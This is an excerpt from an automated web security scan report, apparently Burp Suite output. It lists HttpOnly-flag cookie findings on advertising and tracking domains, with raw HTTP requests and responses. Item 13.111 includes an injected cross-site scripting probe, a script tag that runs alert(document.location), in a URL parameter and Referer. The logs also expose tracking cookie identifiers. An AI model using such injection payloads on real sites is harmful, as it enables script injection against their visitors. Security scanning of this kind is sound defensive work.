Set-Cookie: ZFFBbh=990B826,20|633_962#7Z695_955#5Z332_950#4;expires=Sun, 16 Sep 2012 16:44:17 GMT;domain=.zedo.com;path=/;
ETag: "1822b34-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54170
Expires: Sun, 18 Sep 2011 07:47:07 GMT
Date: Sat, 17 Sep 2011 16:44:17 GMT
Connection: close

GIF89a.............!.......,...........D..;


13.107. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?tid=17&ci=90379962&vn1=4.1.1&vn2=imp&ec=UTF-8&cm_mmc=Undertone%20Inc.%20US-_-2011%20Frost%20Online-_-Demo%20Targeted%20Display%20Ads%20Geo%20Targeted%20to%20Ft.%20Worth%2C%20Austin%2C%20Houston-_-fro11157_phase2_benjamins_300x250_v2 HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=50021315153052143970353

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:05 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90379962_reset=1316278445;path=/
Expires: Fri, 16 Sep 2011 22:54:05 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
13.108. http://domdex.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /nai_optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_optout.php?nocache=0.2196794 HTTP/1.1
Host: domdex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:18:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: optout=deleted; expires=Fri, 17-Sep-2010 17:18:54 GMT; path=/; domain=.domdex.com
Set-Cookie: optout=deleted; expires=Fri, 17-Sep-2010 17:18:54 GMT; path=/; domain=domdex.com
Set-Cookie: optout=1; expires=Wed, 01-Jan-2020 05:00:00 GMT; path=/; domain=.domdex.com
Location: nai_optout_check.php
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.109. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal,hmagthedailygreen/1/H.22.1/s9643802732229  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /b/ss/hmagglobal,hmagthedailygreen/1/H.22.1/s9643802732229

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hmagglobal,hmagthedailygreen/1/H.22.1/s9643802732229?AQB=1&ndh=1&t=17%2F8%2F2011%2016%3A25%3A46%206%20300&ns=hearstmagazines&pageName=The%20Daily%20Green%3A%20Home%20Page&g=http%3A%2F%2Fwww.thedailygreen.com%2F&r=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php&cc=USD&ch=Homepage&server=TDG&events=event61%2Cevent64%2Cevent66%2Cevent67%2Cevent1&c1=Homepage&h1=Homepage&v2=The%20Daily%20Green%3A%20Home%20Page&v3=Homepage&c4=Homepage&v4=Homepage&c6=5%3A00PM&v6=First%20page%20view%20or%20cookies%20not%20supported&c7=Saturday&c8=Weekend&c11=%20&c13=http%3A%2F%2Fwww.thedailygreen.com%2F&c19=First%20page%20view%20or%20cookies%20not%20supported&c27=New&c37=New&v37=New&c48=The%20Daily%20Green%3A%20Home%20Page&c53=PAGE%3A%20The%20Daily%20Green%3A%20Home%20Page&c56=www.thedailygreen.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: hearstmagazines.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Fhesx7Ebex7Ex7Fvx7Dx7Estrx7Ex7C=[CS]v4|2737302185161D3E-400001A26000301A|4E6EB475[CE]; s_vi_erx7Fillgdijg=[CS]v4|2737302185161D3E-400001A26000301C|4E6EB475[CE]; s_vi_nyhylx7B88x3F=[CS]v4|2737A31205158EF1-600001752000ED76|4E6F598F[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2737A31205158EF1-600001752000ED78|4E6F598F[CE]; s_vi_imx7Exxdnevx7Cx7Ech=[CS]v4|2737EACF051D3328-40000105A00A4E23|4E6FE0F9[CE]; s_vi=[CS]v1|273A4BB185162953-60000183A000D98B[CE]

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:28:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bgkmmfehkf=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=hearstmagazines.112.2o7.net; Path=/
Set-Cookie: s_vi_bgkmmfehkf=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|273A4BB185162953-60000183A000D98B|bgkmmfehkf|273A51E185011CD7-4000011320135C83[CE]; Expires=Thu, 15 Sep 2016 16:28:00 GMT; Domain=hearstmagazines.112.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Fri, 16 Sep 2011 16:28:00 GMT
Last-Modified: Sun, 18 Sep 2011 16:28:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E74CA90-7D11-67DACD60"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035258&d.c=gif&d.o=hmagthedailygreen&d.x=113385833&d.t=page&d.u=http%3A%2F%2Fwww.thedailygreen.com%2F&d.r=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
xserver: www613
Content-Length: 0
Content-Type: text/plain

13.110. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /b/ss/hmagglobal/1/H.22.1--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hmagglobal/1/H.22.1--NS/0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: hearstmagazines.112.2o7.net
Cookie: s_vi_bgkmmfehkf=[CS]v4|273A51E185011CD7-4000011320135C83|4E74AC5F[CE]

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:21:12 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bgkmmfehkf=[CS]v4|273A51E185011CD7-4000011320135C83|4E74C8F8[CE]; Expires=Thu, 15 Sep 2016 16:21:12 GMT; Domain=.2o7.net; Path=/
Location: http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 16 Sep 2011 16:21:12 GMT
Last-Modified: Sun, 18 Sep 2011 16:21:12 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www404
Content-Length: 0
Content-Type: text/plain

13.111. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: cm8dccp=1316277291;Path=/;Expires=Sun, 18-Sep-2011 16:34:51 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 574
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://hfm.checkm8.com/adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http
...[SNIP]...
13.112. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:41 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wlLIIUv9UJ7MTba;Path=/;
Set-cookie: C=oYX5Y9we4KW1caacaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:00 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156175586/1230314867/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
13.113. http://hfm.checkm8.com/adam/detected  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:10 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=orY5Y9wQKLW1caa4cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:29 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
13.114. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
Cookie: clid=2lpgndm01170gl99ih0j0xqn27r0n01h78031203907; ipinfo=2lqzzw60zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1lpgndmxzt127r0nxzt11lk0exzt11lk0exzt127r0nxzt127l51; rdrlst=40r13j3lpl77b000000167803159ilpl77b0000001678031ax7lqt5nu0000000778030miwlro8in0000000378031j33lroee90000000178010jv8lptjcn0000000k78031cxnlqt5nu0000000778031ay6lroee90000000178010lw4lqt5nu00000007780317gylqt5nu00000007780317gzlroee90000000178010znmlpl77b0000001678031203lq7dnr0000000878031201lptjcn0000000k78030caflpl77b00000016780300c5lpl77b0000001678030p46lptjcn0000000k7803008slroee900000001780117xjlroee9000000017801196mlpl60r0000001b78030h4glptjcn0000000k78031iy2lroee900000001780115xylpl77b00000016780307sylqt5nu00000007780310polpl60i0000001c78030hv0lqt5nu00000007780316d5lroee9000000017801; sglst=41an0fdq0e06ooag00723ag00l1vag00ebdag00bny9b100klag009rsag000thag10ehdag00g12ag00bo0a370bo1ag10kxxag00dsbag00fdn07044mag708ncag70h93ag70ebcag70g0tag700knag70821ag7; vstcnt=41al010r0a458kv131p202203251dj0m14tl11724e2od118e10624fj9y118e10q24ofw7127p10v24ql0810pp10u24t3e9118e10a251dfja145s11723sti11hj10224mij2127p2062072

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: vstcnt=41al010r0a458kv131p202203251dj0m14tl11724e2od118e10624fj9y118e10q24ofw7127p10v24t3e9118e10a24ql0810pp10u23sti11hj102251dfja145s11724mij2127p2062072; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: clid=2lpgndm01170gl99ih0j0xqn27r3r01i78041204908; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: sglst=41an0fdn07044mag708ncag70821ag70h93ag70g0tag70ebcag700knag70fdq0f06ooag00723ag00ag2age0l1vag00ebdag00bny9b100klag009rsag000thag00ehdag00g12ag00bo0a370bo1ag10kxxag00dsbag0; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: rdrlst=40s13j3lpl77b000000177804159ilpl77b0000001778041ax7lqt5nu0000000878040miwlro8in0000000478041j33lroee90000000278020jv8lptjcn0000000l78041cxnlqt5nu0000000878041ay6lroee90000000278020lw4lqt5nu0000000878041194lroehd00000001780117gylqt5nu00000008780417gzlroee90000000278020znmlpl77b0000001778041203lq7dnr0000000978041201lptjcn0000000l78040caflpl77b00000017780400c5lpl77b0000001778040p46lptjcn0000000l7804008slroee900000002780217xjlroee9000000027802196mlpl60r0000001c78040h4glptjcn0000000l78041iy2lroee900000002780215xylpl77b00000017780407sylqt5nu00000008780410polpl60i0000001d78040hv0lqt5nu00000008780416d5lroee9000000027802; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=531399&ev=gl99ih0j0xqn
Content-Length: 0
Date: Sat, 17 Sep 2011 16:44:01 GMT
Connection: close

13.115. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTgwNiZ0bD01MTg0MDA=&piggybackCookie=uid:439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:29 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
13.116. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.5253928 HTTP/1.1
Host: img.pulsemgr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: c=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...
13.117. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:172jmkh17g10rs&bnum=3413 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: ACID=tX790013123977920032; C2=dxMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; GUID=MTMxNjI3NzM0MTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:37:09 GMT
Server: Microsoft-IIS/6.0
